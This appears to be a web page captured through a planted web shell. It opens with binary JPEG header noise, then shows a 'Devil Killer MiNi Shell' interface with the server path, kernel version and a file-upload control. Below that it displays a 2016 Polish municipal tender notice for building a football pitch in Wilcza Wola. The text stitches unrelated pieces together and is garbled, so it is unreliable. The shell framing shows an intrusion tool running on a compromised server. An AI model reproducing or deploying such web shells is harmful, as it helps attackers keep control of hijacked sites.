JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20161004/

Linux 9dbcd5f6333d 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20161004/317547-N-2016.html

<div class="divRow_xforms"><div>
              Ogłoszenie nr 317547 - 2016
              z dnia 2016-10-04 r.
            </div><div class="headerMedium_xforms" style="text-align: center">Dzikowiec: Budowa boiska piłkarskiego w Wilczej Woli.  <br />
            OGŁOSZENIE O ZAMÓWIENIU -
            
              Roboty budowlane
            </div><div><b>Zamieszczanie ogłoszenia:</b>
              obowiązkowe
            </div><div><b>Ogłoszenie dotyczy:</b>
              zamówienia publicznego
            </div><div><b>Zamówienie dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej </b><br /><div style="padding-left: 20px">
                nie
              </div><br /><b>Nazwa projektu lub programu</b><br /></div><div><b>O zamówienie mogą ubiegać się wyłącznie zakłady pracy chronionej oraz wykonawcy, których działalność, lub działalność ich wyodrębnionych organizacyjnie jednostek, które będą realizowały zamówienie, obejmuje  społeczną i zawodową integrację osób będących członkami grup społecznie marginalizowanych </b><br /><div style="padding-left: 20px">
                nie
              </div><br />
            Należy podać minimalny procentowy wskaźnik zatrudnienia osób należących do jednej lub więcej kategorii, o których mowa w art. 22 ust. 2 ustawy Pzp, nie mniejszy niż 30%, osób zatrudnionych przez zakłady pracy chronionej lub wykonawców albo ich jednostki (w %)
            <br /></div><div class="headerLarge_xforms" style="text-align: left"><u>SEKCJA I: ZAMAWIAJĄCY</u></div><div style="padding-left: 20px"><b>Postępowanie przeprowadza centralny zamawiający </b><br /><div style="padding-left: 20px">
                nie
              </div><b>Postępowanie przeprowadza podmiot, któremu zamawiający powierzył/powierzyli przeprowadzenie postępowania </b><br /><div style="padding-left: 20px">
                nie
              </div><b>Informacje na temat podmiotu któremu zamawiający powierzył/powierzyli prowadzenie postępowania:</b><br /><b>Postępowanie jest przeprowadzane wspólnie przez zamawiających</b><br /><div style="padding-left: 20px">
                nie
              </div><br />
            Jeżeli tak, należy wymienić zamawiających, którzy wspólnie przeprowadzają postępowanie oraz podać adresy ich siedzib, krajowe numery identyfikacyjne oraz osoby do kontaktów wraz z danymi do kontaktów:
            <br /><br /><b>Postępowanie jest przeprowadzane wspólnie z zamawiającymi z innych państw członkowskich Unii Europejskiej </b><br /><div style="padding-left: 20px">
                nie
              </div><b>W przypadku przeprowadzania postępowania wspólnie z zamawiającymi z innych państw członkowskich Unii Europejskiej  mające zastosowanie krajowe prawo zamówień publicznych:</b><br /><b>Informacje dodatkowe:</b><br /></div><div style="padding-left: 20px;"><div style="text-align: left"><b>I. 1) NAZWA I ADRES: </b>Gmina Dzikowiec, krajowy numer identyfikacyjny
              69058169500000, ul.
              ul. Dworska 
              62,
              36122  
              Dzikowiec, woj.
              podkarpackie, państwo
              , tel.
              0-17 7442109, e-mail
              jtecza@vp.pl, faks
              0-17 2274508.
              <br />
              Adres strony internetowej (URL): www.dzikowiec.itl.pl<br /><br /></div><div style="text-align: left"><b>I. 2) RODZAJ ZAMAWIAJĄCEGO: </b>
                Administracja samorządowa
              </div><div style="text-align: left"><b>
                I.3) WSPÓLNE UDZIELANIE ZAMÓWIENIA <i>(jeżeli dotyczy)</i>:
              </b><div style="padding-left: 20px">
                Podział obowiązków między zamawiającymi w przypadku wspólnego przeprowadzania postępowania, w tym
                w przypadku wspólnego przeprowadzania postępowania z zamawiającymi z innych państw członkowskich Unii Europejskiej (który z zamawiających jest odpowiedzialny za przeprowadzenie postępowania, czy i w jakim zakresie za przeprowadzenie postępowania odpowiadają pozostali zamawiający, czy zamówienie będzie udzielane przez każdego z zamawiających indywidualnie, czy zamówienie zostanie udzielone w imieniu i na rzecz pozostałych zamawiających):
                <br /></div></div><div style="text-align: left"><b>
                I.4) KOMUNIKACJA:
              </b><br /><b>Nieograniczony, pełny i bezpośredni dostęp do dokumentów z postępowania można uzyskać pod adresem (URL)</b><div style="padding-left: 20px">
                  tak
                <br />www.dzikowiec.itl.pl/bip/</div><br /><b>Adres strony internetowej, na której zamieszczona będzie specyfikacja istotnych warunków zamówienia </b><div style="padding-left: 20px">
                  tak
                <br />www.dzikowiec.itl.pl/bip/</div><br /><b>Dostęp do dokumentów z postępowania jest ograniczony - więcej informacji można uzyskać pod adresem </b><div style="padding-left: 20px">
                  nie
                <br /></div><br /><b>Oferty lub wnioski o dopuszczenie do udziału w postępowaniu należy przesyłać:</b><br /><b>Elektronicznie</b><div style="padding-left: 20px">
                  nie
                <br />
                adres
                <br /></div><br /><div style="padding-left: 20px"><b>Dopuszczone jest przesłanie ofert lub wniosków o dopuszczenie do udziału w postępowaniu w inny sposób:</b><br />
                  nie
                <br /><b>Wymagane jest przesłanie ofert lub wniosków o dopuszczenie do udziału w postępowaniu w inny sposób:</b><br />
                  tak
                  <br />
                  Inny sposób:
                  <br />Gmina Dzikowiec<br />
                Adres:
                <br />36-122 Dzikowiec , ul. Dworska 62 , pok. nr 11</div><br /><b>Komunikacja elektroniczna wymaga korzystania z narzędzi i urządzeń lub formatów plików, które nie są ogólnie dostępne</b><div style="padding-left: 20px">
                  nie
                <br />
                Nieograniczony, pełny, bezpośredni i bezpłatny dostęp do tych narzędzi można uzyskać pod adresem: (URL)
                <br /></div></div></div><div class="headerLarge_xforms" style="text-align: left"><u>
              SEKCJA II: PRZEDMIOT ZAMÓWIENIA
            </u></div><div style="padding-left: 20px;"><div style="text-align: left"><br /><b>II.1) Nazwa nadana zamówieniu przez zamawiającego: </b>Budowa boiska piłkarskiego w Wilczej Woli.  <br /><b>Numer referencyjny: </b>ZP.271.6.2016 <br /><b>Przed wszczęciem postępowania o udzielenie zamówienia przeprowadzono dialog techniczny </b><br /><div style="padding-left: 20px; text-align: justify">
                  nie
                </div><br /><b>II.2) Rodzaj zamówienia: </b>
                roboty budowlane
              <br /><b>II.3) Informacja o możliwości składania ofert częściowych</b><br />
              Zamówienie podzielone jest na części:
              <br /><div style="padding-left: 20px">
                  Nie
                </div><br /><br /><b>
                II.4) Krótki opis przedmiotu zamówienia
              </b><i>(wielkość, zakres, rodzaj i ilość dostaw, usług lub robót budowlanych lub określenie zapotrzebowania i wymagań )</i><b> a w przypadku partnerstwa innowacyjnego - określenie zapotrzebowania na innowacyjny produkt, usługę lub roboty budowlane:
              </b>3.1. Przedmiotem zamówienia jest budowa boiska piłkarskiego w  Wilczej Woli.
3.2. Zakres rzeczowy:
       1. Budowa boiska do gry  w piłkę nożną  z nawierzchnią z trawy syntetycznej wraz 
           z niezbędnym wyposażeniem o wymiarach 30 m x 62 m.
       2. Budowa bieżni sportowej z nawierzchnią z mączki ceglanej 5 torowa o obwodzie 
           zewnętrznym wokół boiska piłkarskiego  270 mb oraz bieżnią do biegów krótkodystansowych 
           także pięciotorowa    o długości prostej 80 mb.
       3. Budowa oświetlenia boiska.
 4. Budowa ogrodzenia boiska o wysokości 4 m i 6 m. 
3.3. Szczegółowy zakres robót zawierają materiały do  zgłoszenia robót budowlanych , przedmiary
       robót i Specyfikacja Techniczna Wykonania i Odbioru Robót z zastrzeżeniem. Przedmiary
       robót mają  charakter pomocnicy i służą  do zobrazowania skali robót, mają one za zadanie
       pomóc Wykonawcom w oszacowaniu kosztów zamówienia. Wykonawca zobowiązany jest do 
       dokładnego sprawdzenia ilości robót z dokumentacją projektową. 
3.4. Oznaczenie wg Wspólnego Słownika Zamówień (CPV):
 
3.5. Równoważność materiałów i urządzeń.
Jeżeli opis przedmiotu zamówienia lub  załączniki do SIWZ w tym dokumentacja projektowa, przedmiary robót oraz w kosztorysie ofertowym, zostało wskazane pochodzenie ( marka, znak towarowy, producent, dostawca ) materiałów lub normy, aprobaty , specyfikacje i systemy,          o których mowa w art. 30 ust. 1 -3 ustawy Pzp,   Zamawiający dopuszcza oferowanie materia-łów lub   rozwiązań  równoważnych pod warunkiem, że zagwarantują one realizacją robót oraz        zapewnią uzyskanie parametrów technicznych nie gorszych od załażonych w/w dokumentach  . 
Materiały lub urządzenia pochodzące od konkretnych producentów określają minimalne para-metry jakościowe i cechy użytkowe, jakim muszą odpowiadać materiały lub urządzenia ofero-wane przez wykonawcę, aby zostały spełnione wymagania stawiane przez zamawiającego.
Na Wykonawcy spoczywa obowiązek wykazania, iż oferowane  roboty budowlane spełniają wymagania Zamawiającego. 
3.6. Wypełniając dyspozycję zawartą w art. 30 ust. 8 ustawy Pzp, Zamawiający informuje, że 
       określenie w opisie przedmiotu zamówienia wymaganych cech materiału, produktu lub usługi, 
       odpowiadające przeznaczeniu zamierzonemu przez zamawiającego, w szczególności wymagania 
       adekwatne do przedmiotu zamówienia, dostosowania projektu do potrzeb wszystkich 
        użytkowników, w tym zapewnienie dostępności dla osób niepełnosprawnych - zostało zawarte 
       w Specyfikacjach Technicznych Wykonania i Odbioru Robót. 
3.7. Zaleca się, aby Wykonawcy dokonali wizji lokalnej na terenie realizacji inwestycji w celu
       dokonania oceny dokumentów i informacji przekazywanych w ramach przedmiotowego 
       postępowania przez zamawiającego.  
3.8. Wykonawca robót musi zapewnić wykonanie robót zgodnie z prawem polskim, w szczególności 
       z przepisami techniczno-budowlanymi, przepisami dotyczącymi samodzielnych funkcji 
       technicznych w budownictwie oraz przepisami dotyczącymi wyrobów, materiałów stosowanych
      w budownictwie. 
3.9. Zadanie dofinansowane ze środków  Funduszu Rozwoju Kultury Fizycznej Ministerstwa Sportu 
       i Turystyki.
<br /><br /><b>II.5) Główny kod CPV: </b>45212200-8<br /><b> Dodatkowe kody CPV:</b>45212221-1,
                45212220-4,
                45255600-5,
                45311000-0,
                45310000-3,
                45315600-4,
                45316100-6<br /><b>
                II.6) Całkowita wartość zamówienia </b><i>(jeżeli zamawiający podaje informacje o wartości zamówienia)</i>:
              
              <br />
              Wartość bez VAT:
              <br />
              Waluta:
              <br /><div style="padding-left: 20px"><br /><i>(w przypadku umów ramowych lub dynamicznego systemu zakupów  szacunkowa całkowita maksymalna wartość w całym okresie obowiązywania umowy ramowej lub dynamicznego systemu zakupów)</i></div><br /><b>
                II.7)
                Czy przewiduje się udzielenie zamówień, o których mowa w art. 67 ust. 1 pkt 6 i 7  lub w art. 134 ust. 6 pkt 3  ustawy Pzp:
              </b>
                nie
              <br /><b>II.8) Okres, w którym realizowane będzie zamówienie lub okres, na który została zawarta umowa ramowa lub okres, na który został ustanowiony dynamiczny system zakupów:</b><div style="padding-left: 20px">
                    data zakończenia: 30/05/2017<br /></div><br /><b>II.9) Informacje dodatkowe: </b></div></div><div class="headerLarge_xforms" style="text-align: left"><u>
              SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM
            </u></div><div style="padding-left: 20px;"><div style="text-align: left"><b>
                III.1) WARUNKI UDZIAŁU W POSTĘPOWANIU
              </b><br /><div style="padding-left: 20px"><b>III.1.1) Kompetencje lub uprawnienia do prowadzenia określonej działalności zawodowej, o ile wynika to z odrębnych przepisów</b><br />
                Określenie warunków:
                Zamawiający nie określa warunków udziału w postępowaniu w tym zakresie.<br />
                Informacje dodatkowe
                <br /><b>III.1.2)  Sytuacja finansowa lub ekonomiczna  </b><br />
                Określenie warunków:
                Zamawiający nie określa warunków udziału w postępowaniu w tym zakresie.<br />
                Informacje dodatkowe
                <br /><b>III.1.3) Zdolność techniczna lub zawodowa </b><br />
                Określenie warunków:
                   Oceniając zdolność techniczną lub zawodową wykonawcy, zamawiający stawia następujące 
   minimalne warunki dotyczące wykształcenia, kwalifikacji zawodowych, doświadczenia, 
   potencjału technicznego wykonawcy lub osób skierowanych przez wykonawcę do realizacji
   zamówienia umożliwiające realizację zamówienia na odpowiednim poziomie jakości.
a)	doświadczenie wykonawcy
     Zamawiający uzna warunek za spełniony jeżeli wykonawca wykaże, że  nie wcześniej 
               niż   w okresie ostatnich 5 lat przed upływem terminu składania ofert albo wniosków 
               o dopuszczenie do  udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest
               krótszy  w tym okresie, co najmniej jedną robotą  budowlaną  polegającą na  budowie ,  
               przebudowie lub remoncie  boiska sportowego na kwotę nie mniejszą  niż 350.000,00 zł 
               brutto, wraz  z podaniem ich rodzaju, wartości, daty, miejsca wykonania i podmiotów, na 
               rzecz których roboty te zostały wykonane, z załączeniem dowodów określających czy te 
               roboty  budowlane zostały wykonane należycie, w szczególności informacji o tym czy roboty 
               zostały wykonane zgodnie z przepisami prawa budowlanego   i prawidłowo ukończone, 

b)	Kwalifikacje zawodowe  osób skierowanych przez wykonawcę do realizacji zamówienia,
Zamawiający uzna warunek za spełniony jeżeli wykonawca  skieruje do realizacji przed-miotowego  zamówienia publicznego  co najmniej 1 osobą do pełnienia funkcji kierownik budowy posiadająca uprawnienia budowlane do kierowania    robotami     w specjalności     konstrukcyjno-budowlanej bez ograniczeń wydane zgodnie z ustawą   z dnia  07 lipca 1994 r. Prawo budowlane  (tekst jedn. Dz. U. z 2016 r. poz. 290 ) oraz          Rozporządzeniem Ministra Infrastruktury i Rozwoju z dnia 11 września 2014 r. w sprawie  samodzielnych funkcji technicznych  w budownictwie (Dz. U. z 2014 r., poz. 1278), albo odpowiadające im ważne uprawnienia budowlane, które zostały wydane na podstawie  wcześniej obowią-zujących przepisów. 
              Osoba ta musi posiadać całkowite doświadczenie co najmniej 2  letnie na stanowiskach 
odpowiednio: Kierownik budowy lub Kierownik robót . Ilość lat doświadczenia należy
liczyć od daty wystawienia uprawnień. 
         Zamawiający, określając wymogi dla każdej osoby w zakresie posiadanych uprawnień 
         budowlanych, dopuszcza odpowiadające im uprawnienia budowlane wydane obywatelom
         państw Europejskiego Obszaru Gospodarczego oraz Konfederacji Szwajcarskiej, 
         z zastrzeżeniem art. 12 a oraz innych przepisów ustawy Prawo budowlane ( tekst jedn. Dz. 
         U. z 2016 r., poz. 290) oraz ustawy o zasadach uznawania kwalifikacji zawodowych 
         nabytych w państwach członkowskich Unii Europejskiej (Dz. U z 2016 r., poz. 65), które 
         pozwalać będą na pełnienie w/w funkcji w zakresie objętym umową.
         Ilekroć w opisie warunków udziału w postępowaniu jest mowa o uprawnieniach, to w 
        przypadku osób będących obywatelami krajów członkowskich Unii Europejskiej oznacza to
        decyzję w sprawie uznania wymaganych kwalifikacji do wykonywania w Rzeczpospolitej 
        Polskiej samodzielnych funkcji technicznych w budownictwie w zakresie przedmiotu 
             niniejszego zamówienia  zgodnie z właściwymi przepisami, w szczególności z ustawą 
             o zasadach uznania kwalifikacji zawodowych nabytych w krajach członkowskich Unii 
             Europejskiej (Dz. U z 2016 r., poz. 65) oraz ustawą z dnia 15 grudnia 2000 r. o 
             samorządach  zawodowych architektów oraz inżynierów budownictwa  ( tekst jedn. Dz. U 
             z 2014 r., poz.1946).
     5.3. Zamawiający może, na każdym etapie postępowania, uznać, że wykonawca nie posiada wymaganych zdolności, jeżeli zaangażowanie zasobów technicznych lub zawodowych wykonawcy w inne przedsięwzięcia gospodarcze wykonawcy może mieć negatywny wpływ na realizację zamówienia.
<br />
                Zamawiający wymaga od wykonawców wskazania w ofercie lub we wniosku o dopuszczenie do udziału w postępowaniu imion i nazwisk osób wykonujących czynności przy realizacji zamówienia wraz z informacją o kwalifikacjach zawodowych lub doświadczeniu tych osób:
                
                  tak
                <br />
                Informacje dodatkowe:
                </div><b>
                III.2) PODSTAWY WYKLUCZENIA
              </b><br /><div style="padding-left: 20px"><b>III.2.1) Podstawy wykluczenia określone w art. 24 ust. 1  ustawy Pzp</b><br /><b>III.2.2) Zamawiający przewiduje wykluczenie wykonawcy na podstawie art. 24 ust. 5 ustawy Pzp</b>
                  tak
                  <br />
                  Zamawiający przewiduje następujące fakultatywne podstawy wykluczenia:
                <br />
                  (podstawa wykluczenia określona w art. 24 ust. 5 pkt 1 ustawy Pzp)
                <br />
                  (podstawa wykluczenia określona w art. 24 ust. 5 pkt 2 ustawy Pzp)
                <br />
                  (podstawa wykluczenia określona w art. 24 ust. 5 pkt 3 ustawy Pzp)
                <br />
                  (podstawa wykluczenia określona w art. 24 ust. 5 pkt 4 ustawy Pzp)
                <br />
                  (podstawa wykluczenia określona w art. 24 ust. 5 pkt 5 ustawy Pzp)
                <br />
                  (podstawa wykluczenia określona w art. 24 ust. 5 pkt 6 ustawy Pzp)
                <br />
                  (podstawa wykluczenia określona w art. 24 ust. 5 pkt 7 ustawy Pzp)
                <br />
                  (podstawa wykluczenia określona w art. 24 ust. 5 pkt 8 ustawy Pzp)
                <br /></div><b>
                III.3) WYKAZ OŚWIADCZEŃ SKŁADANYCH PRZEZ WYKONAWCĘ W CELU WSTĘPNEGO POTWIERDZENIA, ŻE NIE PODLEGA ON WYKLUCZENIU ORAZ SPEŁNIA WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ SPEŁNIA KRYTERIA SELEKCJI
              </b><br /><div style="padding-left: 20px"><b>
                  Oświadczenie o niepodleganiu wykluczeniu oraz spełnianiu warunków udziału w postępowaniu
                </b><br />
                  tak
                <br /><b>
                  Oświadczenie o spełnianiu kryteriów selekcji
                </b><br />
                  nie
                </div><b>
                III.4) WYKAZ OŚWIADCZEŃ LUB DOKUMENTÓW , SKŁADANYCH PRZEZ WYKONAWCĘ W POSTĘPOWANIU NA WEZWANIE ZAMAWIAJACEGO W CELU POTWIERDZENIA OKOLICZNOŚCI, O KTÓRYCH MOWA W ART. 25 UST. 1 PKT 3 USTAWY PZP:
              </b><br /><div style="padding-left: 20px">odpisu z właściwego rejestru lub z centralnej ewidencji i informacji o działalności
gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu 
potwierdzenia braku podstaw wykluczenia na podstawie art. 24 ust. 5 pkt 1 ustawy
</div><b>
                III.5) WYKAZ OŚWIADCZEŃ LUB DOKUMENTÓW SKŁADANYCH PRZEZ WYKONAWCĘ W POSTĘPOWANIU NA WEZWANIE ZAMAWIAJACEGO W CELU POTWIERDZENIA OKOLICZNOŚCI, O KTÓRYCH MOWA W ART. 25 UST. 1 PKT 1 USTAWY PZP
              </b><br /><div style="padding-left: 20px"><b>III.5.1) W ZAKRESIE SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU:</b><br /> 1. W celu potwierdzenia spełniania warunków udziału w postępowaniu dotyczących           zdolności     technicznej lub zawodowej  zamawiający żąda od wykonawcy:

   a) wykazu robót budowlanych wykonanych nie wcześniej niż w okresie ostatnich 5 lat przed 
       upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, 
       a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich 
       rodzaju, wartości, daty, miejsca wykonania i podmiotów, na rzecz których roboty te zostały
       wykonane, z załączeniem dowodów określających czy te roboty budowlane zostały wykonane 
       należycie, w szczególności informacji o tym czy roboty zostały wykonane zgodnie z przepisa-mi
       prawa budowlanego i prawidłowo ukończone , przy czym dowodami, o których mowa, są refe-
       rencje bądź inne dokumenty wystawione przez podmiot, na rzecz którego roboty 
       budowlane były wykonywane, a jeżeli z uzasadnionej przyczyny o obiektywnym charakterze
      wykonawca nie jest w stanie uzyskać tych dokumentów  inne dokumenty;
b) wykazu osób, skierowanych przez wykonawcę do realizacji zamówienia publicznego, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robota-mi budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, uprawnień, do-świadczenia i wykształcenia niezbędnych do wykonania zamówienia publicznego, a także za-kresu wykonywanych przez nie czynności oraz informacją o podstawie do dysponowania tymi osobami.

<br /><b>III.5.2) W ZAKRESIE KRYTERIÓW SELEKCJI:</b><br /></div><b>
                III.6) WYKAZ OŚWIADCZEŃ LUB DOKUMENTÓW SKŁADANYCH PRZEZ WYKONAWCĘ W POSTĘPOWANIU NA WEZWANIE ZAMAWIAJACEGO W CELU POTWIERDZENIA OKOLICZNOŚCI, O KTÓRYCH MOWA W ART. 25 UST. 1 PKT 2 USTAWY PZP
              </b><br /><div style="padding-left: 20px">3.	Wykaz oświadczeń lub dokumentów składanych przez wykonawcę w ofercie w celu
        potwierdzenia, że oferowane roboty budowlane/usługi/dostawy odpowiadają
        określonym wymaganiom:
1) Opis oferowanej nawierzchni z trawy syntetycznej; 
2) Autoryzacja producenta nawierzchni wystawiona dla wykonawcy;
      3) Karta techniczna nawierzchni z trawy syntetycznej poświadczona przez producenta;
      4) Aktualny Atest Higieniczny PZH (lub dokument równoważny) dopuszczający stosowanie
          oferowanej nawierzchni sportowej (nawierzchni z trawy syntetycznej oraz jej wypełnienia 
          z EPDM) na zewnątrz w obiektach sportowych;
      5) Badania laboratoryjne nawierzchni potwierdzające technologię produkcji sztucznej
           trawy, potwierdzające minimalne wymagane parametry sztucznej trawy oraz spełnianie
           wymogów FIFA Quality Concept for Football Turf z określeniem wszystkich
           elementów systemu nawierzchni ( trawa, mata, granulat) wykonane przez autoryzowane
           laboratorium (np.: Labosport, ISA Sport, Sportslabs, Ercat) - dopuszcza się inny
           rodzaj granulatu gumowego;
       6) Badanie na zgodność z normą PN-EN 15330-1 w celu potwierdzenia pozostałych parametrów
poza minimalnymi wymaganiami dotyczącymi nawierzchni z trawy syntetycznej;
       7) Gwarancja producenta na oferowaną nawierzchnię;
       8) Oświadczenie wraz z dowodami dostawcy granulatu EPDM o zgodności granulatu
z Rozporządzeniem Komisji (UE) Nr. 1272/2013 z dnia 6 grudnia 2013 r. (dot. Rejestracji,
oceny, udzielania zezwoleń i stosowanych ograniczeń w zakresie chemikaliów
[REACH] w odniesieniu wielopierścieniowych węglowodorów aromatycznych);
10) Certyfikat uprawniający do oznaczania wyrobu znakiem bezpieczeństwa B lub certyfikat
zgodności z normą wydany przez jednostkę akredytowaną przez Polskie Centrum
Akredytacji lub dokument równoważny - dotyczy oferowanych bramek do piłki nożnej.

</div><b>
                III.7) INNE DOKUMENTY NIE WYMIENIONE W pkt III.3) - III.6)
              </b><div style="padding-left: 20px">Dokumenty które należy dołączyć do oferty:
           Do wypełnionego i podpisanego formularza oferty należy dołączyć:
a)	aktualne na dzień składnia ofert oświadczenie dotyczące przesłanek wykluczenia 
z postępowania   załącznik nr 2 SIWZ
b)	aktualne na dzień składnia ofert oświadczenie o spełnianiu warunków udziału 
w postępowaniu-  załącznik nr 3 SIWZ 
c)	zobowiązanie do udostępnieniu (w przypadku powoływania się na  zasoby podmiotu trzecie-go)
d)	pełnomocnictwo do podpisania oferty (oryginał lub kopia potwierdzona za zgodność  z ory-ginałem przez notariusza) względnie do podpisania innych dokumentów składanych wraz z ofertą, o ile prawo do ich podpisania nie wynika z innych dokumentów złożonych wraz z ofertą
e)	w przypadku składania oferty przez wykonawców wspólnie ubiegających się o udzielenie zamówienia oferty wspólnej do oferty należy dołączyć stosowne pełnomocnictwo reprezen-towania wszystkich Wykonawców wspólnie ubiegających się o udzielenie zamówienia, ewentualnie umowę o współdziałaniu, z której będzie wynikać przedmiotowe pełnomocnic-two. Pełnomocnik może być ustanowiony do reprezentowania Wykonawców w postępowa-niu albo do reprezentowania w postępowaniu i zawarcia umowy. Pełnomocnictwo winno być załączone w formie oryginału lub notarialnie poświadczonej kopii.



7.7. Jeżeli wykonawca ma siedzibę  lub miejsce zamieszkania poza terytorium Rzeczypospolitej
       Polskiej, zamiast dokumentów, o których mowa w pkt 7.6.2. lit. a) SIWZ: składa dokument
       lub dokumenty wystawione w kraju, w którym wykonawca ma siedzibę lub miejsce 
       zamieszkania, potwierdzające odpowiednio, że nie otwarto jego likwidacji ani nie ogłoszono
  upadłości  wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert.
